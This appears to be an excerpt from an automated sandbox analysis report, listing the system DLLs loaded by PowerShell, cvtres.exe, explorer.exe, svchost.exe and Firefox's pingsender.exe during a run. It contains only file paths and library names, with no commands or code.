Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe	Section loaded: ninput.dll
Source: C:\Windows\explorer.exe	Section loaded: appresolver.dll
Source: C:\Windows\explorer.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\explorer.exe	Section loaded: slc.dll
Source: C:\Windows\explorer.exe	Section loaded: sppc.dll
Source: C:\Windows\explorer.exe	Section loaded: profapi.dll
Source: C:\Windows\explorer.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\explorer.exe	Section loaded: starttiledata.dll
Source: C:\Windows\explorer.exe	Section loaded: idstore.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\explorer.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\explorer.exe	Section loaded: wlidprov.dll
Source: C:\Windows\explorer.exe	Section loaded: samcli.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.applicationmodel.dll
Source: C:\Windows\explorer.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\explorer.exe	Section loaded: policymanager.dll
Source: C:\Windows\explorer.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\explorer.exe	Section loaded: usermgrproxy.dll
Source: C:\Windows\explorer.exe	Section loaded: winsta.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositoryclient.dll
Source: C:\Windows\explorer.exe	Section loaded: sndvolsso.dll
Source: C:\Windows\explorer.exe	Section loaded: mmdevapi.dll
Source: C:\Windows\explorer.exe	Section loaded: devobj.dll
Source: C:\Windows\explorer.exe	Section loaded: appextension.dll
Source: C:\Windows\explorer.exe	Section loaded: oleacc.dll
Source: C:\Windows\explorer.exe	Section loaded: wintypes.dll
Source: C:\Windows\explorer.exe	Section loaded: textshaping.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.ui.dll
Source: C:\Windows\explorer.exe	Section loaded: windowmanagementapi.dll
Source: C:\Windows\explorer.exe	Section loaded: textinputframework.dll
Source: C:\Windows\explorer.exe	Section loaded: inputhost.dll
Source: C:\Windows\explorer.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\explorer.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\explorer.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll
Source: C:\Windows\explorer.exe	Section loaded: dcomp.dll
Source: C:\Windows\explorer.exe	Section loaded: d3d11.dll
Source: C:\Windows\explorer.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\explorer.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\explorer.exe	Section loaded: dxcore.dll
Source: C:\Windows\explorer.exe	Section loaded: d2d1.dll
Source: C:\Windows\explorer.exe	Section loaded: dwrite.dll
Source: C:\Windows\explorer.exe	Section loaded: xmllite.dll
Source: C:\Windows\explorer.exe	Section loaded: cldapi.dll
Source: C:\Windows\explorer.exe	Section loaded: fltlib.dll
Source: C:\Windows\explorer.exe	Section loaded: dataexchange.dll
Source: C:\Windows\explorer.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\explorer.exe	Section loaded: explorerframe.dll
Source: C:\Windows\explorer.exe	Section loaded: apphelp.dll
Source: C:\Windows\explorer.exe	Section loaded: tiledatarepository.dll
Source: C:\Windows\explorer.exe	Section loaded: staterepository.core.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepository.dll
Source: C:\Windows\explorer.exe	Section loaded: twinui.pcshell.dll
Source: C:\Windows\explorer.exe	Section loaded: wkscli.dll
Source: C:\Windows\explorer.exe	Section loaded: wincorlib.dll
Source: C:\Windows\explorer.exe	Section loaded: cdp.dll
Source: C:\Windows\explorer.exe	Section loaded: dsreg.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.immersiveshell.serviceprovider.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositorycore.dll
Source: C:\Windows\explorer.exe	Section loaded: mrmcorer.dll
Source: C:\Windows\explorer.exe	Section loaded: msctfmonitor.dll
Source: C:\Windows\explorer.exe	Section loaded: msutb.dll
Source: C:\Windows\explorer.exe	Section loaded: languageoverlayutil.dll
Source: C:\Windows\explorer.exe	Section loaded: bcp47mrm.dll
Source: C:\Windows\explorer.exe	Section loaded: thumbcache.dll
Source: C:\Windows\explorer.exe	Section loaded: edputil.dll
Source: C:\Windows\explorer.exe	Section loaded: inputswitch.dll
Source: C:\Windows\explorer.exe	Section loaded: dui70.dll
Source: C:\Windows\explorer.exe	Section loaded: duser.dll
Source: C:\Windows\explorer.exe	Section loaded: uianimation.dll
Source: C:\Windows\explorer.exe	Section loaded: pcshellcommonproxystub.dll
Source: C:\Windows\explorer.exe	Section loaded: photometadatahandler.dll
Source: C:\Windows\explorer.exe	Section loaded: notificationcontrollerps.dll
Source: C:\Windows\explorer.exe	Section loaded: rmclient.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptngc.dll
Source: C:\Windows\explorer.exe	Section loaded: ncrypt.dll
Source: C:\Windows\explorer.exe	Section loaded: ntasn1.dll
Source: C:\Windows\explorer.exe	Section loaded: ntshrui.dll
Source: C:\Windows\explorer.exe	Section loaded: shellcommoncommonproxystub.dll
Source: C:\Windows\explorer.exe	Section loaded: cscapi.dll
Source: C:\Windows\explorer.exe	Section loaded: cflapi.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.networking.connectivity.dll
Source: C:\Windows\explorer.exe	Section loaded: npmproxy.dll
Source: C:\Windows\explorer.exe	Section loaded: linkinfo.dll
Source: C:\Windows\explorer.exe	Section loaded: ehstorshell.dll
Source: C:\Windows\explorer.exe	Section loaded: cscui.dll
Source: C:\Windows\explorer.exe	Section loaded: provsvc.dll
Source: C:\Windows\explorer.exe	Section loaded: stobject.dll
Source: C:\Windows\explorer.exe	Section loaded: wmiclnt.dll
Source: C:\Windows\explorer.exe	Section loaded: batmeter.dll
Source: C:\Windows\explorer.exe	Section loaded: sxs.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.ui.shell.dll
Source: C:\Windows\explorer.exe	Section loaded: es.dll
Source: C:\Windows\explorer.exe	Section loaded: prnfldr.dll
Source: C:\Windows\explorer.exe	Section loaded: actxprxy.dll
Source: C:\Windows\explorer.exe	Section loaded: wpnclient.dll
Source: C:\Windows\explorer.exe	Section loaded: atlthunk.dll
Source: C:\Windows\explorer.exe	Section loaded: dxp.dll
Source: C:\Windows\explorer.exe	Section loaded: shdocvw.dll
Source: C:\Windows\explorer.exe	Section loaded: syncreg.dll
Source: C:\Windows\explorer.exe	Section loaded: actioncenter.dll
Source: C:\Windows\explorer.exe	Section loaded: wevtapi.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\Windows\explorer.exe	Section loaded: audioses.dll
Source: C:\Windows\explorer.exe	Section loaded: dusmapi.dll
Source: C:\Windows\explorer.exe	Section loaded: pnidui.dll
Source: C:\Windows\explorer.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\explorer.exe	Section loaded: netprofm.dll
Source: C:\Windows\explorer.exe	Section loaded: networkuxbroker.dll
Source: C:\Windows\explorer.exe	Section loaded: ethernetmediamanager.dll
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\explorer.exe	Section loaded: wlanapi.dll
Source: C:\Windows\explorer.exe	Section loaded: wpdshserviceobj.dll
Source: C:\Windows\explorer.exe	Section loaded: portabledevicetypes.dll
Source: C:\Windows\explorer.exe	Section loaded: wscinterop.dll
Source: C:\Windows\explorer.exe	Section loaded: wscapi.dll
Source: C:\Windows\explorer.exe	Section loaded: ncsi.dll
Source: C:\Windows\explorer.exe	Section loaded: portabledeviceapi.dll
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\explorer.exe	Section loaded: cscobj.dll
Source: C:\Windows\explorer.exe	Section loaded: msasn1.dll
Source: C:\Windows\explorer.exe	Section loaded: srchadmin.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.search.dll
Source: C:\Windows\explorer.exe	Section loaded: werconcpl.dll
Source: C:\Windows\explorer.exe	Section loaded: framedynos.dll
Source: C:\Windows\explorer.exe	Section loaded: wer.dll
Source: C:\Windows\explorer.exe	Section loaded: synccenter.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptbase.dll
Source: C:\Windows\explorer.exe	Section loaded: hcproviders.dll
Source: C:\Windows\explorer.exe	Section loaded: imapi2.dll
Source: C:\Windows\explorer.exe	Section loaded: storageusage.dll
Source: C:\Windows\explorer.exe	Section loaded: fhcfg.dll
Source: C:\Windows\explorer.exe	Section loaded: efsutil.dll
Source: C:\Windows\explorer.exe	Section loaded: mpr.dll
Source: C:\Windows\explorer.exe	Section loaded: netapi32.dll
Source: C:\Windows\explorer.exe	Section loaded: dsrole.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.system.userprofile.dll
Source: C:\Windows\explorer.exe	Section loaded: cloudexperiencehostbroker.dll
Source: C:\Windows\explorer.exe	Section loaded: credui.dll
Source: C:\Windows\explorer.exe	Section loaded: wdscore.dll
Source: C:\Windows\explorer.exe	Section loaded: dbghelp.dll
Source: C:\Windows\explorer.exe	Section loaded: dbgcore.dll
Source: C:\Windows\explorer.exe	Section loaded: ieproxy.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.web.dll
Source: C:\Windows\explorer.exe	Section loaded: bluetoothapis.dll
Source: C:\Windows\explorer.exe	Section loaded: bluetoothapis.dll
Source: C:\Windows\explorer.exe	Section loaded: settingsync.dll
Source: C:\Windows\explorer.exe	Section loaded: settingsynccore.dll
Source: C:\Windows\explorer.exe	Section loaded: wpnapps.dll
Source: C:\Windows\explorer.exe	Section loaded: msxml6.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.globalization.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: wininet.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: msvcp140.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: vcruntime140_1.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: vcruntime140_1.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: iertutil.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: wldp.dll
